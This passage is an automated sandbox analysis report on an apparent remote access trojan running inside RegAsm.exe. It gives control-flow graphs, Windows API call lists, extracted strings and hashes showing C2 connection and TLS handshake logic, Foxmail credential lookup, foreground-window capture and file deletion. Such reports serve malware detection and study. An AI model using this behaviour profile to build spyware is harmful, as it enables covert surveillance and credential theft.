* 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,02x,00000000), ref: 00414FB6
                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$ErrorLastLocalTime
                                                                                                                          • String ID: | $%I64u$({x$02x$5.1.2 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-EPF38I$TLS Off$TLS On $dMG$hlight$name$NG$NG
                                                                                                                          • API String ID: 524882891-3510977168
                                                                                                                          • Opcode ID: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
                                                                                                                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                          • Opcode Fuzzy Hash: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
                                                                                                                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1094 412e43-412e5f call 401f04 call 41c516 1091->1094 1092->1094 1100 412e61-412e73 call 401f04 DeleteFileW 1094->1100 1101 412e79-412e7b 1094->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1105 412e99-412eab call 406b63 1103->1105 1104->1103 1107 412e81-412e86 1104->1107 1110 412f01-412f20 call 401f09 * 3 1105->1110 1111 412ead-412ebb call 406b63 1105->1111 1107->1103 1107->1105 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1136 412eff 1123->1136 1136->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63781986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                          • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                          • API String ID: 1223786279-2576077980
                                                                                                                          • Opcode ID: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
                                                                                                                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                          • Opcode Fuzzy Hash: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
                                                                                                                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1303 414ed4-414ee5 GetProcAddress 1300->1303 1305 414ee7-414eeb 1303->1305 1306 414eef-414ef2 FreeLibrary 1303->1306 1305->1303 1307 414eed 1305->1307 1308 414ef4-414ef6 1306->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                          • API String ID: 2490988753-744132762
                                                                                                                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                          • String ID: 02x$8SG$8SG$pQG$pQG
                                                                                                                          • API String ID: 3795512280-2907552742
                                                                                                                          • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                          • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1412 4048c8-4048e8 connect 1413 404a1b-404a1f 1412->1413 1414 4048ee-4048f1 1412->1414 1417 404a21-404a2f WSAGetLastError 1413->1417 1418 404a97 1413->1418 1415 404a17-404a19 1414->1415 1416 4048f7-4048fa 1414->1416 1419 404a99-404a9e 1415->1419 1420 404926-404930 call 420cf1 1416->1420 1421 4048fc-404923 call 40531e call 402093 call 41b580 1416->1421 1417->1418 1422 404a31-404a34 1417->1422 1418->1419 1434 404941-40494e call 420f20 1420->1434 1435 404932-40493c 1420->1435 1421->1420 1424 404a71-404a76 1422->1424 1425 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1422->1425 1427 404a7b-404a94 call 402093 * 2 call 41b580 1424->1427 1425->1418 1427->1418 1444 404950-404973 call 402093 * 2 call 41b580 1434->1444 1445 404987-404992 call 421ad1 1434->1445 1435->1427 1474 404976-404982 call 420d31 1444->1474 1458 4049c4-4049d1 call 420e97 1445->1458 1459 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1445->1459 1471 4049d3-4049f6 call 402093 * 2 call 41b580 1458->1471 1472 4049f9-404a14 CreateEventW * 2 1458->1472 1459->1474 1471->1472 1472->1415 1474->1418
                                                                                                                          APIs
                                                                                                                          • connect.WS2_32(FFFFFFFF,02384988,00000010), ref: 004048E0
                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                          • API String ID: 994465650-2151626615
                                                                                                                          • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                          • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3658366068-0
                                                                                                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                          • API String ID: 911427763-3954389425
                                                                                                                          • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                          • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1584 40da6f-40da94 call 401f86 1587 40da9a 1584->1587 1588 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1584->1588 1589 40dae0-40dae7 call 41c048 1587->1589 1590 40daa1-40daa6 1587->1590 1591 40db93-40db98 1587->1591 1592 40dad6-40dadb 1587->1592 1593 40dba9 1587->1593 1594 40db9a-40dba7 call 43c11f 1587->1594 1595 40daab-40dab9 call 41b645 call 401f13 1587->1595 1596 40dacc-40dad1 1587->1596 1597 40db8c-40db91 1587->1597 1610 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1589->1610 1611 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1589->1611 1600 40dbae call 43c11f 1590->1600 1591->1600 1592->1600 1593->1600 1594->1593 1612 40dbb4-40dbb9 call 409092 1594->1612 1618 40dabe 1595->1618 1596->1600 1597->1600 1613 40dbb3 1600->1613 1623 40dac2-40dac7 call 401f09 1610->1623 1611->1618 1612->1588 1613->1612 1618->1623 1623->1588
                                                                                                                          APIs
                                                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LongNamePath
                                                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                          • API String ID: 82841172-425784914
                                                                                                                          • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                          • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1683 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1694 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1683->1694 1695 41b3ee-41b3f7 1683->1695 1705 41b3e6-41b3e9 call 401fd8 1694->1705 1706 41b3da-41b3e3 call 41cffa 1694->1706 1696 41b400 1695->1696 1697 41b3f9-41b3fe 1695->1697 1699 41b405-41b410 call 40537d 1696->1699 1697->1699 1705->1695 1706->1705
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                          • String ID: (32 bit)$ (64 bit)$02x$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                          • API String ID: 782494840-3854768321
                                                                                                                          • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                          • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
